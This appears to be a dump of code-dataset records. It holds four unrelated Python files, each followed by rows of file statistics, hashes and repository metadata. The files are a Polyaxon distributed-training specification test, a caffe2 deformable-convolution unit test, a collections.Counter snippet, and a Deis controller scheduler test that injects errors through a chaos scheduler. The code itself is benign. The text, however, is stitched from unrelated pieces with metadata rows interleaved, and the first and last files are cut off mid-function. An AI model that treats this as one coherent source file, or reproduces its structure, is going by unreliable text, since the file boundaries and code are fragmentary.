worker_resources = HorovodSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.horovod.n_workers
assert set(worker_resources.values()) == {
spec.environment.horovod.default_worker_resources,
spec.environment.horovod.worker_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4, 'limits': 2 + 3 * 4},
'memory': {'requests': 300 + 256 * 4, 'limits': 300 + 256 * 4},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5}, True)
def test_distributed_pytorch_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_pytorch_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.PYTORCH
assert spec.environment.pytorch.n_workers == 5
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.pytorch.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.pytorch.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.pytorch.default_worker_resources.cpu.requests == 3
assert spec.environment.pytorch.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.pytorch.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.pytorch.default_worker_resources.memory.requests == 256
assert spec.environment.pytorch.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.pytorch.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.pytorch.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.pytorch.worker_resources[0].index == 3
assert spec.environment.pytorch.worker_resources[0].memory.requests == 300
assert spec.environment.pytorch.worker_resources[0].memory.limits == 300
# check that properties for return list of configs and resources is working
cluster, is_distributed = spec.cluster_def
worker_resources = PytorchSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.pytorch.n_workers
assert set(worker_resources.values()) == {
spec.environment.pytorch.default_worker_resources,
spec.environment.pytorch.worker_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4, 'limits': 2 + 3 * 4},
'memory': {'requests': 300 + 256 * 4, 'limits': 300 + 256 * 4},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5}, True)
def test_distributed_mxnet_passes(self):
plxfile = PolyaxonFile(os.path.abspath(
'tests/fixtures/distributed_mxnet_file.yml'))
spec = plxfile.specification
assert spec.version == 1
assert spec.project.name == 'project1'
assert isinstance(spec.settings, SettingsConfig)
assert isinstance(spec.settings.logging, LoggingConfig)
assert spec.settings.matrix is None
assert isinstance(spec.environment, EnvironmentConfig)
assert spec.is_runnable
assert spec.framework == Frameworks.MXNET
assert spec.environment.mxnet.n_workers == 5
assert spec.environment.mxnet.n_ps == 10
assert isinstance(spec.environment.resources, PodResourcesConfig)
assert isinstance(spec.environment.resources.cpu, K8SResourcesConfig)
assert spec.environment.resources.cpu.requests == 1
assert spec.environment.resources.cpu.limits == 2
assert isinstance(spec.environment.mxnet.default_worker_resources,
PodResourcesConfig)
assert isinstance(spec.environment.mxnet.default_worker_resources.cpu,
K8SResourcesConfig)
assert spec.environment.mxnet.default_worker_resources.cpu.requests == 3
assert spec.environment.mxnet.default_worker_resources.cpu.limits == 3
assert isinstance(spec.environment.mxnet.default_worker_resources.memory,
K8SResourcesConfig)
assert spec.environment.mxnet.default_worker_resources.memory.requests == 256
assert spec.environment.mxnet.default_worker_resources.memory.limits == 256
assert isinstance(spec.environment.mxnet.worker_resources[0], PodResourcesConfig)
assert isinstance(spec.environment.mxnet.worker_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.mxnet.worker_resources[0].index == 3
assert spec.environment.mxnet.worker_resources[0].memory.requests == 300
assert spec.environment.mxnet.worker_resources[0].memory.limits == 300
assert isinstance(spec.environment.mxnet.default_ps_resources,
PodResourcesConfig)
assert isinstance(spec.environment.mxnet.default_ps_resources.cpu,
K8SResourcesConfig)
assert spec.environment.mxnet.default_ps_resources.cpu.requests == 2
assert spec.environment.mxnet.default_ps_resources.cpu.limits == 4
assert isinstance(spec.environment.mxnet.ps_resources[0],
PodResourcesConfig)
assert isinstance(spec.environment.mxnet.ps_resources[0].memory,
K8SResourcesConfig)
assert spec.environment.mxnet.ps_resources[0].index == 9
assert spec.environment.mxnet.ps_resources[0].memory.requests == 512
assert spec.environment.mxnet.ps_resources[0].memory.limits == 1024
# check that properties for return list of configs and resources is working
cluster, is_distributed = spec.cluster_def
worker_resources = MXNetSpecification.get_worker_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(worker_resources) == spec.environment.mxnet.n_workers
assert set(worker_resources.values()) == {
spec.environment.mxnet.default_worker_resources,
spec.environment.mxnet.worker_resources[0]}
ps_resources = MXNetSpecification.get_ps_resources(
environment=spec.environment,
cluster=cluster,
is_distributed=is_distributed
)
assert len(ps_resources) == spec.environment.mxnet.n_ps
assert set(ps_resources.values()) == {
spec.environment.mxnet.default_ps_resources,
spec.environment.mxnet.ps_resources[0]}
# Check total resources
assert spec.total_resources == {
'cpu': {'requests': 1 + 3 * 4 + 2 * 9, 'limits': 2 + 3 * 4 + 4 * 9},
'memory': {'requests': 300 + 256 * 4 + 512, 'limits': 300 + 256 * 4 + 1024},
'gpu': None
}
assert spec.cluster_def == ({TaskType.MASTER: 1,
TaskType.WORKER: 5,
TaskType.SERVER: 10}, True)
| 50.465608
| 99
| 0.681825
| 4,021
| 38,152
| 6.314101
| 0.056702
| 0.087439
| 0.084288
| 0.065934
| 0.910828
| 0.891804
| 0.869117
| 0.848163
| 0.751507
| 0.706763
| 0
| 0.016347
| 0.230368
| 38,152
| 755
| 100
| 50.53245
| 0.848313
| 0.021519
| 0
| 0.667183
| 0
| 0
| 0.040938
| 0.020992
| 0
| 0
| 0
| 0
| 0.611455
| 1
| 0.027864
| false
| 0.021672
| 0.027864
| 0
| 0.057276
| 0.001548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31e407499063f380188c03157c1ae29f391f5de3
| 19,350
|
py
|
Python
|
caffe2/python/operator_test/deform_conv_test.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | 40
|
2021-06-01T07:37:59.000Z
|
2022-03-25T01:42:09.000Z
|
caffe2/python/operator_test/deform_conv_test.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | 14
|
2021-06-01T11:52:46.000Z
|
2022-03-25T02:13:08.000Z
|
caffe2/python/operator_test/deform_conv_test.py
|
wenhaopeter/read_pytorch_code
|
491f989cd918cf08874dd4f671fb7f0142a0bc4f
|
[
"Intel",
"X11"
] | 7
|
2021-07-20T19:34:26.000Z
|
2022-03-13T21:07:36.000Z
|
from __future__ import absolute_import, division, print_function
import os
import unittest
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from caffe2.proto import caffe2_pb2
from caffe2.python import core, utils, workspace
from hypothesis import assume, given
def _cudnn_supports(dilation=False, nhwc=False):
"""Return True if cuDNN supports this configuration."""
v = workspace.GetCuDNNVersion()
if dilation and v < 6000:
# Dilation not supported until v6
return False
if dilation and nhwc:
# Dilation and NHWC not supported together
return False
return True
def _conv_1d_output_size(size, kernel, pad, dilation, stride):
return max(1, int((size + pad * 2 - (dilation * (kernel - 1) + 1)) / stride) + 1)
def _conv_2d_output_size(size, kernel, pad_h, pad_w, dilation, stride_h, stride_w):
return [
_conv_1d_output_size(size, kernel, pad_h, dilation, stride_h),
_conv_1d_output_size(size, kernel, pad_w, dilation, stride_w),
]
def _conv_2d_offsets_dims(
batch_size,
size,
kernel,
pad_h,
pad_w,
dilation,
stride_h,
stride_w,
deformable_group,
):
dims = [batch_size, 2 * kernel * kernel * deformable_group]
dims.extend(
_conv_2d_output_size(size, kernel, pad_h, pad_w, dilation, stride_h, stride_w)
)
return dims
def _conv_2d_random_offsets(batch_size, kernel, dims, num_deformable_group):
o = []
for y0 in range(0, kernel):
for x0 in range(0, kernel):
# stay away from integer offsets which correspond to "ridges" on the
# interpolated surface resulting in less precise estimates
x = np.random.randint(0, kernel) + np.random.uniform(0.05, 0.95)
y = np.random.randint(0, kernel) + np.random.uniform(0.05, 0.95)
o.append(y - y0)
o.append(x - x0)
o = o * num_deformable_group
e = []
for v in o:
e.append([[v] * dims[1]] * dims[0])
return np.array([e] * batch_size).astype(np.float32)
def _conv_2d_shuffle_offsets(
batch_size, kernel, dims, num_deformable_group, input_channels, output_channels
):
o = []
w0 = [[0 for x in range(kernel)] for y in range(kernel)]
for y0 in range(0, kernel):
for x0 in range(0, kernel):
x = np.random.randint(0, kernel)
y = np.random.randint(0, kernel)
o.append(y - y0)
o.append(x - x0)
w0[y][x] += 1
o = o * num_deformable_group
e = []
for v in o:
e.append([[v] * int(dims[1])] * int(dims[0]))
w0 = [[w0] * input_channels] * output_channels
return (
np.array([e] * batch_size).astype(np.float32),
utils.NCHW2NHWC(np.array(w0).astype(np.float32)),
)
class TestConvolution(hu.HypothesisTestCase):
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 3),
pad=st.integers(0, 3),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 3),
**hu.gcs_gpu_only
)
def test_null_offset_convolution(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
offset_dims = _conv_2d_offsets_dims(
batch_size,
size,
kernel,
pad,
pad,
dilation,
stride,
stride,
deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
o = np.zeros(tuple(offset_dims), np.float32)
w = (
np.random.rand(output_channels, kernel, kernel, input_channels).astype(
np.float32
)
- 0.5
)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
if size + pad + pad < dkernel or size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
def reference_conv_op(*args):
reference_op = core.CreateOperator(
"Conv",
["X", "w", "b"] if use_bias else ["X", "w"],
["Y0"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
device_option=gc,
)
workspace.RunOperatorOnce(reference_op)
reference_blob = workspace.FetchBlob("Y0")
return (reference_blob,)
self.assertReferenceChecks(gc, op, inputs, reference_conv_op)
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 3),
pad=st.integers(0, 0),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 4),
**hu.gcs_gpu_only
)
def test_flat_input_convolution(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
X = np.ones((batch_size, size, size, input_channels), np.float32) - 0.5
output_size = _conv_2d_output_size(
size, kernel, pad, pad, dilation, stride, stride
)
o = _conv_2d_random_offsets(batch_size, kernel, output_size, deformable_group)
w = np.ones((output_channels, kernel, kernel, input_channels), np.float32) - 0.5
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
if size + pad + pad < dkernel or size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
def reference_conv_op(*args):
reference_op = core.CreateOperator(
"Conv",
["X", "w", "b"] if use_bias else ["X", "w"],
["Y0"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
device_option=gc,
)
workspace.RunOperatorOnce(reference_op)
reference_blob = workspace.FetchBlob("Y0")
return (reference_blob,)
self.assertReferenceChecks(gc, op, inputs, reference_conv_op)
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 1),
pad=st.integers(0, 0),
kernel=st.integers(1, 5),
dilation=st.integers(1, 1),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 4),
**hu.gcs_gpu_only
)
def test_shuffle_input_convolution(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
output_size = _conv_2d_output_size(
size, kernel, pad, pad, dilation, stride, stride
)
o, w0 = _conv_2d_shuffle_offsets(
batch_size,
kernel,
output_size,
deformable_group,
input_channels,
output_channels,
)
w = np.ones((output_channels, kernel, kernel, input_channels), np.float32)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
w0 = utils.NHWC2NCHW(w0)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
if size + pad + pad < dkernel or size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
def reference_conv_op(*args):
with core.DeviceScope(gc):
workspace.FeedBlob("w0", w0)
reference_op = core.CreateOperator(
"Conv",
["X", "w0", "b"] if use_bias else ["X", "w0"],
["Y0"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
device_option=gc,
)
workspace.RunOperatorOnce(reference_op)
reference_blob = workspace.FetchBlob("Y0")
return (reference_blob,)
self.assertReferenceChecks(gc, op, inputs, reference_conv_op)
# CUDNN does NOT support different padding values and we skip it
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride_h=st.integers(1, 3),
stride_w=st.integers(1, 3),
pad_h=st.integers(0, 3),
pad_w=st.integers(0, 3),
kernel=st.integers(2, 5),
size=st.integers(1, 8),
input_channels=st.integers(1, 3),
output_channels=st.integers(1, 3),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
shared_buffer=st.booleans(),
use_bias=st.booleans(),
deformable_group=st.integers(1, 3),
**hu.gcs_gpu_only
)
def test_conv_separate_stride_pad_gradients(
self,
stride_h,
stride_w,
pad_h,
pad_w,
kernel,
size,
input_channels,
output_channels,
batch_size,
order,
shared_buffer,
use_bias,
deformable_group,
gc,
dc,
):
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride_h=stride_h,
stride_w=stride_w,
pad_t=pad_h,
pad_l=pad_w,
pad_b=pad_h,
pad_r=pad_w,
kernel=kernel,
order=order,
shared_buffer=int(shared_buffer),
deformable_group=deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
output_size = _conv_2d_output_size(
size, kernel, pad_h, pad_w, 1, stride_h, stride_w
)
o = _conv_2d_random_offsets(batch_size, kernel, output_size, deformable_group)
w = (
np.random.rand(output_channels, kernel, kernel, input_channels).astype(
np.float32
)
- 0.5
)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
if size + pad_h * 2 < kernel or size + pad_w * 2 < kernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(len(inputs)):
self.assertGradientChecks(gc, op, inputs, i, [0])
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 3),
pad=st.integers(0, 3),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 3),
**hu.gcs_gpu_only
)
def test_conv_gradients(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
output_size = _conv_2d_output_size(
size, kernel, pad, pad, dilation, stride, stride
)
o = _conv_2d_random_offsets(batch_size, kernel, output_size, deformable_group)
w = (
np.random.rand(output_channels, kernel, kernel, input_channels).astype(
np.float32
)
- 0.5
)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
if size + pad + pad < dkernel or size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(len(inputs)):
self.assertGradientChecks(gc, op, inputs, i, [0])
if __name__ == "__main__":
import unittest
unittest.main()
| 31.983471
| 88
| 0.542067
| 2,227
| 19,350
| 4.537045
| 0.085766
| 0.045527
| 0.038104
| 0.021378
| 0.854315
| 0.847783
| 0.827197
| 0.812055
| 0.788005
| 0.774446
| 0
| 0.024467
| 0.343101
| 19,350
| 604
| 89
| 32.036424
| 0.770435
| 0.021447
| 0
| 0.792593
| 0
| 0
| 0.018763
| 0
| 0
| 0
| 0
| 0
| 0.068519
| 1
| 0.025926
| false
| 0
| 0.018519
| 0.003704
| 0.094444
| 0.001852
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
730f271daa01cea7e2a786ed7a0479a1657d4a7b
| 174
|
py
|
Python
|
src/lesson_data_structures/collections_counter_init.py
|
jasonwee/asus-rt-n14uhp-mrtg
|
4fa96c3406e32ea6631ce447db6d19d70b2cd061
|
[
"Apache-2.0"
] | 3
|
2018-08-14T09:33:52.000Z
|
2022-03-21T12:31:58.000Z
|
src/lesson_data_structures/collections_counter_init.py
|
jasonwee/asus-rt-n14uhp-mrtg
|
4fa96c3406e32ea6631ce447db6d19d70b2cd061
|
[
"Apache-2.0"
] | null | null | null |
src/lesson_data_structures/collections_counter_init.py
|
jasonwee/asus-rt-n14uhp-mrtg
|
4fa96c3406e32ea6631ce447db6d19d70b2cd061
|
[
"Apache-2.0"
] | null | null | null |
import collections
print(collections.Counter(['a', 'b', 'c', 'a', 'b', 'b']))
print(collections.Counter({'a': 2, 'b': 3, 'c': 1}))
print(collections.Counter(a=2, b=3, c=1))
| 29
| 58
| 0.597701
| 29
| 174
| 3.586207
| 0.344828
| 0.461538
| 0.663462
| 0.692308
| 0.557692
| 0.557692
| 0.557692
| 0.557692
| 0.557692
| 0
| 0
| 0.038462
| 0.103448
| 174
| 5
| 59
| 34.8
| 0.628205
| 0
| 0
| 0
| 0
| 0
| 0.051724
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
731f366cb77b7e77026d7d8b5c59f0d946c66531
| 21,814
|
py
|
Python
|
controller/api/tests/test_scheduler.py
|
yun-an/deis
|
de27c11475bb7ca24816f288aa115699a1c37e26
|
[
"Apache-2.0"
] | 3,375
|
2015-01-01T04:03:45.000Z
|
2022-02-08T14:53:45.000Z
|
controller/api/tests/test_scheduler.py
|
yun-an/deis
|
de27c11475bb7ca24816f288aa115699a1c37e26
|
[
"Apache-2.0"
] | 2,422
|
2015-01-01T02:40:01.000Z
|
2021-11-30T07:50:32.000Z
|
controller/api/tests/test_scheduler.py
|
yun-an/deis
|
de27c11475bb7ca24816f288aa115699a1c37e26
|
[
"Apache-2.0"
] | 688
|
2015-01-01T00:36:48.000Z
|
2022-01-22T00:32:07.000Z
|
"""
Unit tests for the Deis api app.
Run the tests with "./manage.py test api"
"""
from __future__ import unicode_literals
import json
from django.conf import settings
from django.contrib.auth.models import User
from django.test import TransactionTestCase
import mock
from rest_framework.authtoken.models import Token
from scheduler import chaos
@mock.patch('api.models.publish_release', lambda *args: None)
class SchedulerTest(TransactionTestCase):
"""Tests creation of containers on nodes"""
fixtures = ['tests.json']
def setUp(self):
self.user = User.objects.get(username='autotest')
self.token = Token.objects.get(user=self.user).key
# start without any chaos
chaos.CREATE_ERROR_RATE = 0
chaos.DESTROY_ERROR_RATE = 0
chaos.START_ERROR_RATE = 0
chaos.STOP_ERROR_RATE = 0
# use chaos scheduler
settings.SCHEDULER_MODULE = 'scheduler.chaos'
# provide mock authentication used for run commands
settings.SSH_PRIVATE_KEY = '<some-ssh-private-key>'
def tearDown(self):
# reset for subsequent tests
settings.SCHEDULER_MODULE = 'scheduler.mock'
settings.SSH_PRIVATE_KEY = ''
def test_create_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale to zero for consistency
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# let's get chaotic
chaos.CREATE_ERROR_RATE = 0.5
# scale up but expect a 503
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to create some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 0)
def test_start_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale to zero for consistency
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# let's get chaotic
chaos.START_ERROR_RATE = 0.5
# scale up, which will allow some crashed containers
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# make sure some failed
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['crashed', 'up']))
def test_restart_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
